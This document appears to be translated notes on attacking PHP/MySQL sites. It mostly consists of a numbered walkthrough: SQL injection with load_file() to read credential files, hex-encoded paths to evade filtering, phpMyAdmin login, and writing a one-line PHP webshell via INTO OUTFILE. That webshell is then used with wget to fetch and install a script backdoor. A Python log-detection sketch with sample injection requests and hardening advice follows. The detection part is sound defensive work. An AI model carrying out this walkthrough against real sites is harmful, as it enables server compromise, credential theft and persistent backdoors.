1. MySQL user privileges (visible in mysql.user): File_priv allows reading and writing files on the system, provided the current system user has read and write permission on the file in question.
2. The load_file() function reads the contents of a file.
3. INTO OUTFILE (exports character-type files, such as text files) or INTO DUMPFILE (can export binary files, such as executables) exports the contents of a database to a file.
4. A one-sentence trojan (a one-line webshell), <?php system ($_request[cmd];)?>, can execute commands.
5. Hover over a link on the site; if the status bar below shows php?id=, the page generally interacts with the database.
6. At a display position, user() shows the current user, database() shows the current database name, version() (or @@version) shows the database version, @@basedir shows the database installation path, and @@datadir shows the database data path.
7. Use load_file() at a display position to load a file by its physical path. Because magic_quotes_gpc may be enabled, convert the path to hexadecimal, which gets past that restriction. If the loaded file holds no database information, the files it includes generally hold the database connection information, so use load_file() again to load those included files.
8. Apart from the Enterprise Edition, MySQL does not accept remote connections. Such sites generally run phpMyAdmin, usually reachable by appending phpmyadmin to the site URL.
9. Use load_file() to read the username and password from the included file and log in to phpMyAdmin. Create a new database, table and field, and then execute this statement in the database: SELECT * from <table name> into outfile '<website absolute path>/<export file name (create your own)>'
Visit <website absolute path>/<exported file name>.php to see whether the export was successful.
Access <website absolute path>/<exported file name>.php?<created field>=ls to list all files under the path.
Use wget to download the script backdoor: <website absolute path>/<exported file name>.php?<created field>=wget+<download address>
After the download is complete, use <website absolute path>/<exported file name>.php?<created field>=ls to list all files under the path and see whether the download was successful.
Use <website absolute path>/<exported file name>.php?<created field>=mv+<original file name>+<new file name>
Visit <website absolute path>/<new file name> to log in to the script backdoor. (The backdoor password can be viewed with <website absolute path>/<exported file name>.php?<created field>=cat ./<newly created file name>)
The load_file() function and INTO OUTFILE under PHP and MySQL
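
From the defender's side, the primitives in items 2, 3 and 7 leave recognisable traces in web access logs. The following detection sketch is an added example, not part of the original notes; the function names, the /news.php URL and the sample request lines are constructed for illustration.

```python
from __future__ import annotations
import re
from urllib.parse import unquote_plus

# File-access SQL primitives named in items 2, 3 and 7 of the list above.
PRIMITIVES = {
    "load_file": re.compile(r"load_file\s*\(", re.I),
    "into_outfile": re.compile(r"into\s+outfile\b", re.I),
    "into_dumpfile": re.compile(r"into\s+dumpfile\b", re.I),
}
# 0x... literal with an even number of hex digits (item 7's hex-encoded path).
HEX_LITERAL = re.compile(r"\b0x((?:[0-9a-f]{2})+)\b", re.I)


def decode_hex_literals(text: str) -> list[str]:
    """Return the printable strings carried in 0x... literals."""
    decoded = []
    for match in HEX_LITERAL.finditer(text):
        value = bytes.fromhex(match.group(1)).decode("latin-1")
        if value.isprintable():
            decoded.append(value)
    return decoded


def inspect(request_line: str) -> dict | None:
    """Flag one access-log request line; None means no primitive was seen."""
    text = unquote_plus(request_line)  # undo %xx and '+' encoding first
    hits = [name for name, rx in PRIMITIVES.items() if rx.search(text)]
    if not hits:
        return None
    return {"primitives": hits, "hex_strings": decode_hex_literals(text)}


# Constructed sample request lines (hypothetical site, not from the page).
SAMPLE = [
    "GET /news.php?id=7 HTTP/1.1",
    "GET /news.php?id=-1+union+select+1,load_file(0x2f746d702f612e747874),3 HTTP/1.1",
    "GET /news.php?id=1%20union%20select%201,2,3%20INTO%20OUTFILE%20%27/tmp/x.txt%27 HTTP/1.1",
]

if __name__ == "__main__":
    for line in SAMPLE:
        print(inspect(line), "<-", line)
```

A match is a signal to review the request and the application code behind it. The capability itself is removed by revoking the FILE privilege (File_priv in item 1) from the application's database account and restricting file operations with MySQL's secure_file_priv setting.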